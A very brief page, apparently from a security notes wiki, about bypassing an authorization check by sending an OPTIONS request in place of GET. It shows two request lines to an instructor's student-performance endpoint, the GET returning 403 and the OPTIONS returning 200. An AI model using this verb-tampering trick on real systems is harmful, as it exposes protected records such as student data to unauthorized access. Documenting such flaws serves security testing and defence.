How to bypass access authorization authentication using the OPTIONS method
GET /instructor/performance/students/?course_id=497558 HTTP/1.1 : 403 Forbidden
OPTIONS /instructor/performance/students/?course_id=497558 HTTP/1.1 : 200 OK
Last updated 3 years ago